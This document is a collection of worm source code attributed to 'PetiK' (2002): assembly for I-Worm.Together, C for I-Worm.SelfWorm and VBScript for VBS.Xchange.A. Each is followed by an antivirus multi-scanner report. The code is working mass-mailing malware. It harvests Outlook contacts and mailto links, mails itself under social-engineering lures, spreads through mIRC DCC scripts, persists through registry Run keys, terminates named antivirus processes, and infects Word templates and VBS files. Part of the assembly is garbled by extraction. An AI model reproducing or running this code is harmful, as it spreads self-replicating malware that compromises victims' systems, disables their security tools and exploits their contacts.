; spread with mIRC. Thanx to Microsoft.

push 1 push 0 push 0 push offset vbs_worm @pushsz "open" push 0 api ShellExecuteA verif_inet: push 0 push offset inet

api dec jnz

InternetGetConnectedState eax verif_inet

push 50 push offset t_ini api GetSystemDirectoryA @pushsz "\together.ini" push offset t_ini api lstrcat push push push push push push push api inc je dec xchg xor push push push push push push api test je xchg xor push push push push push api test je xchg push push api cmp jbe 00h 80h 03h 00h 01h 80000000h offset t_ini CreateFileA eax end_spread_worm eax eax,ebx eax,eax eax eax eax 2 eax ebx CreateFileMappingA eax,eax end_s1 eax,ebp eax,eax eax eax eax 4 ebp MapViewOfFile eax,eax end_s2 eax,esi 0 ebx GetFileSize eax,4 end_s3

scan_mail: xor edx,edx mov edi,offset mail_addr push edi p_c: lodsb cmp al," " je car_s cmp al,";" je end_m cmp al,"#" je f_mail cmp al,'@' jne not_a inc edx not_a: stosb jmp p_c car_s: inc esi jmp p_c end_m: xor al,al stosb pop edi test edx,edx je scan_mail call send_mail jmp scan_mail

f_mail: end_s3: api end_s2: api end_s1: api push esi UnmapViewOfFile push ebp CloseHandle push ebx CloseHandle

end_spread_worm: popad jmp e_s_w Spread_Worm EndP send_mail: xor push push push push push api ret eax,eax eax eax offset Message eax [sess] MAPISendMail

.data ; === Copy Worm === orig_worm db 50 dup (0) copy_worm db 50 dup (0) verif_worm db 50 dup (0) sysTime db 16 dup(0) ; === Fuck AntiVirus === uProcess PROCESSENTRY32 <?> ProcessID dd ? lSnapshot dd ? new_name db 100 dup (?) ; === Spread With mIrc === s_mirc: db "[script]",CRLF db ";Don't edit this file.",CRLF,CRLF db "n0=on 1:JOIN:{",CRLF db "n1= /if ( $nick == $me ) { halt }",CRLF db "n2= /.dcc send $nick " mirc_exe db 50 dup (?) db CRLF,"n3=}",0 e_mirc: byte_write dd ? ; === Spread with Outlook === vbs_worm db 50 dup (0) t_ini db 50 dup (0) mail_addr db 128 dup (?) inet dd 0 sess dd 0 subject body filename Message dd dd dd dd dd dd dd dd dd dd dd MsgFrom dd dd dd dd ? ? ? ? db "Re: Answer",0 db "Here for you...",0 db "funny_game.exe",0 dd ? offset subject offset body ? ? ? 2 offset MsgFrom 1 offset MsgTo 1 offset Attach dd ?

dd ? MsgTo dd dd dd dd dd dd dd dd dd dd dd s_vbs: db db db db db db db db db db db db db db db db db db db e_vbs: ? 1 offset mail_addr offset mail_addr ? ? dd ? ? ? offset orig_worm offset filename ?

Attach

'On Error Resume Next',CRLF 'Set fs=CreateObject("Scripting.FileSystemObject")',CRLF 'Set sys=fs.GetSpecialFolder(1)',CRLF 'Set c=fs.CreateTextFile(sys&"\together.ini")',CRLF 'c.Close',CRLF 'Set ou=CreateObject("Outlook.Application")',CRLF 'Set map=ou.GetNameSpace("MAPI")',CRLF 'adr=""',CRLF 'For Each mel in map.AddressLists',CRLF 'If mel.AddressEntries.Count <> 0 Then',CRLF 'For O=1 To mel.AddressEntries.Count',CRLF 'adr=adr &";"& mel.AddressEntries(O).Address',CRLF 'Next',CRLF 'End If',CRLF 'Next',CRLF 'adr=adr &";#"',CRLF,CRLF 'Set c=fs.OpenTextFile(sys&"\together.ini",2)',CRLF 'c.WriteLine adr',CRLF 'c.Close',CRLF

signature author

db "I-Worm.Together " db "Coded by PetiK - 2002",00h

end start_worm end

File Together.exe received on 05.16.2009 19:41:01 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result Email-Worm.Win32.Petik!IK Win32/PetTick.worm.5120 Worm/Petik.FunGame Worm/Win32.Win32 W32/Malware!e382 Win32:PetikTogether I-Worm/Petik Generic.Malware.SIMPPkg.5A573F5C I-Worm.Petik Worm.Petik-2 Worm.Win32.Petik Win32.Petik.8192 Win32.Pet_Tick.AC Win32/Petik.5120.B W32/Malware!e382 Email-Worm.Win32.Petik W32/Petik.M@mm Generic.Malware.SIMPPkg.5A573F5C Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM Artemis!91703278352E Worm.Petik.FunGame Worm:Win32/Petick@mm Win32/Petik W32/Petik.D@mm Worm Generic I-Worm.Pettog.A Medium Risk Malware Worm.Together W32/Petik-R W32.Pet_Tick.AC@mm W32.Pet_Tick.AC@mm WORM_PETIK.M Win32.Worm.Together I-Worm.Pettog.A

Additional information File size: 5120 bytes MD5...: 91703278352e9e18d01d081c73330ec2 SHA1..: 81366149cda1578b5dc71b4c4860f9555467e1a4 PEiD..: UPX 2.90 [LZMA] -&gt; Markus Oberhumer, Laszlo Molnar &amp; John Reiser

/* Start : April 1st 2002 Name : I-Worm.SelfWorm Coder : PetiK Language : C */ #include #include #include #include #include #include <windows.h> <stdio.h> <mapi.h> <tlhelp32.h> <winver.h> "SelfWorm.h"

#if defined (win32) #define IS_WIN32 TRUE #else #define IS_WIN32 FALSE #endif HINSTANCE hInst; // Instance courante.

LPCTSTR lpszAppName = "SelfWorm"; LPCTSTR lpszTitle = "SelfWorm 1.0"; char filename[100],cpywrm[100],copy2[100],start[100]; LPSTR Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run", SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders"; LPTSTR cmdLine,ptr; BOOL installed,rProcessFound; HANDLE fd,lSnapshot,myproc; BYTE desktop[50],favoris[50],personal[50],cache[50],startup[100]; DWORD sizcache=sizeof(desktop),sizfavoris=sizeof(favoris), sizpersonal=sizeof(personal),sizdesktop=sizeof(cache),sizstartup=sizeof(startup); DWORD type=REG_SZ; FILE *vbsworm; LHANDLE session; MapiMessage mess; MapiMessage *mes; MapiRecipDesc from; char messId[512],mname[50],maddr[30]; HINSTANCE hMAPI; HKEY hReg; PROCESSENTRY32 uProcess; void void ULONG ULONG ULONG ULONG ULONG ULONG mirc(char *); StopAV(char *); (PASCAL (PASCAL (PASCAL (PASCAL (PASCAL (PASCAL FAR FAR FAR FAR FAR FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG); *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG); *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE); *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR); *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *); *mFreeBuffer)(LPVOID);

BOOL RegisterWin95(CONST WNDCLASS* lpwc); int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { MSG msg; HWND hWnd; WNDCLASS wc; RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg); RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop); RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris); RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal); RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache); RegQueryValueEx(hReg,"Startup",0,&type,startup,&sizstartup); RegCloseKey(hReg); GetModuleFileName(hInstance,filename,100);

GetSystemDirectory((char *)cpywrm,100); strcat(cpywrm,"\\ShellW32.exe"); CopyFile(filename,cpywrm,0); strcpy(copy2,cpywrm); strcat(copy2," -i"); RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg); RegSetValueEx(hReg,"Shell32",0,REG_SZ,(BYTE *)copy2,100); RegCloseKey(hReg); installed=FALSE; cmdLine=GetCommandLine(); if(cmdLine) { for(ptr=cmdLine;ptr[0]!='-' && ptr[1]!=0;ptr++); if(ptr[0]=='-' && ptr[1]!=0) { switch(ptr[1]) { default: break; case 'i': installed=TRUE; break; } } } hMAPI=LoadLibrary("MAPI32.DLL"); (FARPROC &)mSendMail=GetProcAddress(hMAPI,"MAPISendMail"); (FARPROC &)mLogon=GetProcAddress(hMAPI,"MAPILogon"); (FARPROC &)mLogoff=GetProcAddress(hMAPI,"MAPILogoff"); (FARPROC &)mFindNext=GetProcAddress(hMAPI,"MAPIFindNext"); (FARPROC &)mReadMail=GetProcAddress(hMAPI,"MAPIReadMail"); (FARPROC &)mFreeBuffer=GetProcAddress(hMAPI,"MAPIFreeBuffer"); if(!installed) {

wc.style wc.lpfnWndProc wc.cbClsExtra wc.cbWndExtra wc.hInstance wc.hIcon wc.hCursor wc.hbrBackground wc.lpszMenuName wc.lpszClassName

= = = = = = = = = =

CS_HREDRAW | CS_VREDRAW; (WNDPROC)WndProc; 0; 0; 0; LoadIcon(hInstance, lpszAppName); LoadCursor(NULL, IDC_ARROW); (HBRUSH)(COLOR_WINDOW+1); lpszAppName; lpszAppName;

;

if(!RegisterWin95(&wc)) return FALSE; hInst = hInstance; hWnd = CreateWindow (lpszAppName, lpszTitle, WS_OVERLAPPEDWINDOW|WS_MAXIMIZEBOX, 150,150,300,200,NULL,NULL,hInstance,NULL); if(!hWnd) return FALSE; ShowWindow(hWnd, nCmdShow); ShowWindow(hWnd,SW_SHOWNORMAL); UpdateWindow(hWnd); while(GetMessage(&msg, NULL, 0,0)) { TranslateMessage(&msg); DispatchMessage(&msg); } return(msg.wParam); }

else { MessageBox(NULL,"SelfWorm actif","SelfWorm",MB_OK|MB_ICONINFORMATION); FreeLibrary(hMAPI); } }

BOOL RegisterWin95(CONST WNDCLASS* lpwc) { WNDCLASSEX wcex; wcex.style = lpwc->style; wcex.lpfnWndProc = lpwc->lpfnWndProc; wcex.cbClsExtra = lpwc->cbClsExtra; wcex.cbWndExtra = lpwc->cbWndExtra; wcex.hInstance = lpwc->hInstance; wcex.hIcon = lpwc->hIcon; wcex.hCursor = lpwc->hCursor; wcex.hbrBackground = lpwc->hbrBackground; wcex.lpszMenuName = lpwc->lpszMenuName; wcex.lpszClassName = lpwc->lpszClassName; wcex.cbSize = sizeof(WNDCLASSEX); wcex.hIconSm = LoadIcon(wcex.hInstance, "TDW"); return RegisterClassEx(&wcex); } LRESULT CALLBACK WndProc( HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam) { static HWND hEdit = NULL; switch(uMsg) { case WM_INITDIALOG: hEdit=CreateWindow( "BUTTON", "ABOUT",WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON,0,0,290,190,hWnd,(HMENU)IDM_ABOUT,hInst,NULL ); break; case WM_COMMAND: switch(LOWORD(wParam)) { case IDM_ABOUT: MessageBox(NULL,"Written by PetiK. (c)2002","I-Worm.SelfWorm", MB_OK|MB_ICONINFORMATION); break; case IDM_MIRC: mirc("C:\\mirc\\script.ini"); mirc("C:\\mirc32\\script.ini"); mirc("C:\\Program Files\\mirc\\script.ini"); mirc("C:\\Program Files\\mirc32\\script.ini"); mirc("C:\\progra~1\\mirc\\script.ini"); mirc("C:\\progra~1\\mirc32\\script.ini"); break; case IDM_STOPAV: StopAV("AVP32.EXE"); // AVP StopAV("AVPCC.EXE"); // AVP StopAV("AVPM.EXE"); // AVP StopAV("WFINDV32.EXE"); // Dr. Solomon StopAV("F-AGNT95.EXE"); // F-Secure StopAV("NAVAPW32.EXE"); // Norton Antivirus StopAV("NAVW32.EXE"); // Norton Antivirus StopAV("NMAIN.EXE"); // Norton Antivirus StopAV("PAVSCHED.EXE"); // Panda AntiVirus StopAV("ZONEALARM.EXE"); // ZoneAlarm break; case IDM_STARTUP: strcpy(start,startup); strcat(start,"\\Shell32.exe"); CopyFile(filename,"C:\\hello.exe",0); break; case IDM_VBSSPREAD: vbsworm=fopen("C:\\selfworm.vbs","w"); fprintf(vbsworm,"On Error Resume Next\n"); fprintf(vbsworm,"Set sys=sf.GetSpecialFolder(1)\n"); fprintf(vbsworm,"Set OA=CreateObject(%cOutlook.Application %c)\n",34,34); fprintf(vbsworm,"Set MA=OA.GetNameSpace(%cMAPI%c)\n",34,34); fprintf(vbsworm,"For Each C In MA.AddressLists\n"); fprintf(vbsworm,"If C.AddressEntries.Count <> 0 Then\n"); fprintf(vbsworm,"For D=1 To C.AddressEntries.Count\n"); fprintf(vbsworm,"Set AD=C.AddressEntries(D)\n"); fprintf(vbsworm,"Set EM=OA.CreateItem(0)\n"); fprintf(vbsworm,"EM.To=AD.Address\n"); fprintf(vbsworm,"EM.Subject=%cHi %c&AD.Name&%c look at this. %c\n",34,34,34,34); fprintf(vbsworm,"body=%cI found this on the web.%c\n",34,34); fprintf(vbsworm,"body = body & VbCrLf & %cOpen this funny tool. %c\n",34,34);

fprintf(vbsworm,"EM.Body=body\n"); fprintf(vbsworm,"EM.Attachments.Add(%c%s%c)\n",34,cpywrm,34); fprintf(vbsworm,"EM.DeleteAfterSubmit=True\n"); fprintf(vbsworm,"If EM.To <> %c%c Then\n",34,34); fprintf(vbsworm,"EM.Send\n"); fprintf(vbsworm,"End If\n"); fprintf(vbsworm,"Next\n"); fprintf(vbsworm,"End If\n"); fprintf(vbsworm,"Next\n"); fclose(vbsworm); ShellExecute(NULL,"open","C:\\selfworm.vbs",NULL,NULL,SW_SHOWNORMAL); Sleep(3000); DeleteFile("C:\\selfworm.vbs"); break; case IDM_READMAIL: mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session); if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) { do { if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY| MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) { strcpy(mname,mes->lpOriginator->lpszName); strcpy(maddr,mes->lpOriginator->lpszAddress); mes->ulReserved=0; mes->lpszSubject="Re: NEW MAIL."; mes->lpszNoteText="Here you have a new mail with a funny tool. No danger.\n" " See you soon."; mes->lpszMessageType=NULL; mes->lpszDateReceived=NULL; mes->lpszConversationID=NULL; mes->flFlags=MAPI_SENT; mes->lpOriginator->ulReserved=0; mes->lpOriginator->ulRecipClass=MAPI_ORIG; mes->lpOriginator->lpszName=mes->lpRecips->lpszName; mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress; mes->nRecipCount=1; mes->lpRecips->ulReserved=0; mes->lpRecips->ulRecipClass=MAPI_TO; mes->lpRecips->lpszName=mname; mes->lpRecips->lpszAddress=maddr; mes->nFileCount=1; mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc)); memset(mes->lpFiles, 0, sizeof(MapiFileDesc)); mes->lpFiles->ulReserved=0; mes->lpFiles->flFlags=NULL; mes->lpFiles->nPosition=-1; mes->lpFiles->lpszPathName=filename; mes->lpFiles->lpszFileName="funny_tool.exe"; mes->lpFiles->lpFileType=NULL; mSendMail(session, NULL, mes, NULL, NULL); } } while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS); free(mes->lpFiles); mFreeBuffer(mes); mLogoff(session,0,0,0); } break; case IDM_EXIT : FreeLibrary(hMAPI); DestroyWindow(hWnd); break; } break; case WM_DESTROY : PostQuitMessage(0); break; default: return (DefWindowProc(hWnd, uMsg, wParam, lParam)); } return(0L); } void mirc(char *dir) { FILE *script;

script=fopen("C:\\script.ini","w"); fprintf(script,"[script]\n"); fprintf(script,"n0=on 1:JOIN:#:{\n"); fprintf(script,"n1= /if ( $nick == $me ) { halt }\n"); fprintf(script,"n2= /.dcc send $nick %s\n",cpywrm); fprintf(script,"n3=}\n"); fclose(script); CopyFile("C:\\script.ini",dir,0); DeleteFile("C:\\script.ini"); } void StopAV(char *antivirus) { register BOOL term; lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); uProcess.dwSize=sizeof(uProcess); rProcessFound=Process32First(lSnapshot,&uProcess); while(rProcessFound) { if(strstr(uProcess.szExeFile,antivirus)!=NULL) { // Norton Antivirus myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID); if(myproc!=NULL) { term=TerminateProcess(myproc,0); } CloseHandle(myproc); } rProcessFound=Process32Next(lSnapshot,&uProcess); } CloseHandle(lSnapshot); }

File SelfWorm.exe received on 05.16.2009 19:29:16 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result Trojan.Win32.SystemHijack!IK TR/Agent.29696.34 Trojan/Win32.heuristic W32/Heuristic-119!Eldorado Win32:Trojan-gen {Other} Generic13.ANUQ Generic.Malware.SIMPPk.0E8A8CAE BACKDOOR.Trojan Win32.HEURMalware W32/Heuristic-119!Eldorado PossibleThreat Generic.Malware.SIMPPk.0E8A8CAE Trojan.Win32.SystemHijack Trojan.Win32.Malware.1 Heur.Trojan.Generic Generic.dx!cf Generic.dx!cf Trojan.Agent.29696.34 Trojan:Win32/SystemHijack.gen probably unknown NewHeur_PE Trj/CI.A VBS.LoveLetter Medium Risk Malware Trojan.Spy.Win32.Undef.GEN [Suspicious] Mal/Generic-A Heur.Trojan.Generic PAK_Generic.001 VBS.LoveLetter

Additional information File size: 29696 bytes MD5...: e1a99c8d213bd20c976cabc1afb709f3 SHA1..: f886237a582c9bb29b30bb00e87dda8a067150f7 PEiD..: UPX 2.90 [LZMA] -&gt; Markus Oberhumer, Laszlo Molnar &amp; John Reiser

' ' ' '

Name : VBS.Xchange.A Author : PetiK Language : VBS Date : 27/04/2002

On Error Resume Next Set fso=CreateObject("Scripting.FileSystemObject") Set ws=CreateObject("WScript.Shell") Set fl=fso.OpenTextFile(WScript.ScriptFullname,1) virus=fl.ReadAll fl.Close Set win=fso.GetSpecialFolder(0) fcopy=win&"\MSXchange.vbs" reg="HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" fso.GetFile(WScript.ScriptFullName).Copy(fcopy) ws.RegWrite reg&"\MsExchange",fcopy set sp=fso.CreateTextFile("C:\XChange.vba",True,8) sp.WriteLine "Attribute VB_Name = ""Xchange""" sp.WriteLine "Sub AutoOpen()" sp.WriteLine "On Error Resume Next" sp.WriteLine "e = """"" For i=1 To len(virus) e=Mid(virus,i,1) e=Hex(Asc(e)) If Len(e)=1 Then e="0"&e End If f=f+e If Len(f)=110 Then sp.WriteLine "e = e + """+f+"""" f="" End If If Len(virus)-i = 0 Then sp.WriteLine "e = e + """+f+"""" f="" End If Next sp.WriteLine "read=dec(e)" sp.WriteLine "Open ""C:\xchange.vbs"" For Output As #1" sp.WriteLine "Print #1, read" sp.WriteLine "Close #1" sp.WriteLine "Shell ""wscript C:\xchange.vbs""" sp.WriteLine "Call infect_fichier" sp.WriteLine "End Sub" sp.WriteLine "" sp.WriteLine "Sub HelpAbout()" sp.WriteLine "On Error Resume Next" sp.WriteLine "MsgBox ""This is my very first VBS-W97M Worm"", vbInformation, ""IWorm.Xchange""" sp.WriteLine "End Sub" sp.WriteLine "" sp.WriteLine "Sub AutoClose()" sp.WriteLine "On Error Resume Next" sp.WriteLine "FileSystem.Kill ""C:\xchange.vbs""" sp.WriteLine "End Sub" sp.WriteLine "" sp.WriteLine "Sub infect_fichier()" sp.WriteLine "On Error Resume Next" sp.WriteLine "Set nor = NormalTemplate.VBProject.VBComponents" sp.WriteLine "Set doc = ActiveDocument.VBProject.VBComponents" sp.WriteLine "df = ""C:\XChange.vba""" sp.WriteLine "If nor.Item(""Xchange"").Name <> ""Xchange"" Then" sp.WriteLine " doc(""Xchange"").Export df" sp.WriteLine " nor.Import df" sp.WriteLine "End If" sp.WriteLine "If doc.Item(""Xchange"").Name <> ""Xchange"" Then" sp.WriteLine " nor(""Xchange"").Export df" sp.WriteLine " doc.Import df" sp.WriteLine " ActiveDocument.Save"

sp.WriteLine sp.WriteLine sp.WriteLine sp.WriteLine sp.WriteLine sp.WriteLine sp.WriteLine sp.WriteLine sp.Close

"End If" "End Sub" "" "Function dec(octe)" "For hexad = 1 To Len(octe) Step 2" "dec = dec & Chr(""&h"" & Mid(octe, hexad, 2))" "Next" "End Function"

infvbs(win) infvbs(fso.GetSpecialFolder(1)) SendWithOutlook() Set wd=CreateObject("Word.Application") If ws.RegRead ("HKLM\Software\Microsoft\MsXchange") <> "Coded by PetiK (c)2002" then CN = CreateObject("WScript.NetWork").ComputerName Set srch=wd.Application.FileSearch srch.Lookin = "C:\": srch.SearchSubFolders = True: srch.FileName="*.doc;*.dot": srch.Execute Set sp=fso.OpenTextFile(fcopy,8) sp.WriteLine "'On "&date& " at "&time&" from "&CN sp.WriteLine "'Number of DOC and DOT file found : "& srch.FoundFiles.Count sp.WriteBlankLines(1) sp.Close ws.RegWrite "HKLM\Software\Microsoft\MsXchange","Coded by PetiK (c)2002" End If Set vba=wd.NormalTemplate.VBProject.VBComponents If vba.Item("Xchange").Name <> "Xchange" Then vba.Import "C:\XChange.vba" wd.Application.NormalTemplate.Save End If wd.Application.NormalTemplate.Close wd.Application.Quit Set mel=fso.CreateTextFile(win&"\kitep.wab.txt",8,TRUE) counter=0 lect() mel.WriteLine "#" mel.Close WScript.Quit Sub lect() On Error Resume Next Set dr=fso.Drives For Each d in dr If d.DriveType=2 or d.DriveType=3 Then list(d.path&"\") End If Next End Sub Sub spreadmailto(dir) On Error Resume Next Set fso=CreateObject("Scripting.FileSystemObject") Set f=fso.GetFolder(dir) Set cf=f.Files For Each fil in cf ext=fso.GetExtensionName(fil.path) ext=lcase(ext) if (ext="htm") or (ext="html") or (ext="htt") or (ext="asp") Then set htm=fso.OpenTextFile(fil.path,1) verif=True allhtm=htm.ReadAll() htm.Close For ml=1 To Len(allhtm) count=0 If Mid(allhtm,ml,7) = "mailto:" Then counter=counter+1 mlto="" Do While Mid(allhtm,ml+6+count,1) <> """" count=count+1 mlto = mlto + Mid(allhtm,ml+6+count,1) loop

mel.WriteLine counter &" <"&left(mlto,len(mlto)-1)&">" sendmailto(left(mlto,len(mlto)-1)) End If Next End If Next End Sub Sub list(dir) On Error Resume Next Set f=fso.GetFolder(dir) Set ssf=f.SubFolders For Each fil in ssf spreadmailto(fil.path) list(fil.path) Next End Sub Sub sendmailto(email) Set out=CreateObject("Outlook.Application") Set mailmelto=out.CreateItem(0) mailmelto.To email mailmelto.Subject "Upgrade Ms Exchange" mailmelto.Body "Run this attached file to upgrade Ms Exchange" mailmelto.Attachment.Add (WScript.ScriptFullName) mailmelto.DeleteAfterSubmit = True mailmelto.Send Set out = Nothing End Sub Sub SendWithOutlook() Set A=CreateObject("Outlook.Application") Set B=A.GetNameSpace("MAPI") For Each C In B.AddressLists If C.AddressEntries.Count <> 0 Then For D=1 To C.AddressEntries.count Set E=C.AddressEntries(D) Set F=A.CreateItem(0) F.To=E.Address F.Subject="Update and upgrade MS Exchange." F.Body="run this attached file to update Ms Exchange. See you soon." Set G=CreateObject("Scripting.FileSystemObject") F.Attachments.Add(fcopy) F.DeleteAfterSubmit=True If F.To <> "" Then F.Send End If Next End If Next End Sub Function infvbs(Folder) If f.FolderExists(Folder) then For each P in f.GetFolder(Folder).Files ext=f.GetExtensionName(P.Name) If ext="vbs" or ext="vbe" Then Set VF=f.OpenTextFile(P.path, 1) mark=VF.Read(14) VF.Close If mark <> "'VBS.Xchange.A" Then Set VF=f.OpenTextFile(P.path, 1) VC=VF.ReadAll VF.Close VCd=virus & VC Set VF=f.OpenTextFile(P.path,2,True) VF.Write VCd VF.Close End If End If

Next End If End Function

File Xchange_A.vbs received on 05.16.2009 20:03:44 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result Email-Worm.VBS.Xchange.A!IK VBS/Chu Worm/Chu.1 Worm/VBS.VBS VBS/Chu.A@mm VBS:Malware-gen I-Worm/Petik Generic.ScriptWorm.72BAC97E VBS/Chu.A Worm.Chu.1 Email-Worm.VBS.Chu.a VBS.Generic.15 VBS.FireBurn. VBS/VBSWG!generic VBS/Chu.A@mm Email-Worm.VBS.Chu.a VBS/Chu.A@mm Generic.ScriptWorm.72BAC97E Email-Worm.VBS.Xchange.A Email-Worm.VBS.Chu.a VBS/Generic@MM VBS/Generic@MM Worm.Chu.1 Virus:VBS/Chu probably unknown SCRIPT VBS/Chu.D VBS.Chu.B@mm VBS/Chu VBS.Petxch.A Script.VBS.Chu VBS/Xchange-A VBS.Pet_Tick.gen VBS_CHU.A Email-Worm.VBS.Chu.a VBS.Petxch.A

Additional information File size: 5770 bytes MD5...: de34d735d30bd0e107e14bb6aa8bf3e0 SHA1..: 8d976194e4ae851e0408c53f0db41f9c6f994a46

' ' ' '

Name : VBS.Xchange.B aka RasLFront (because of French Presidential election on 2002) Author : PetiK Language : VBS Date : 05/05/2002

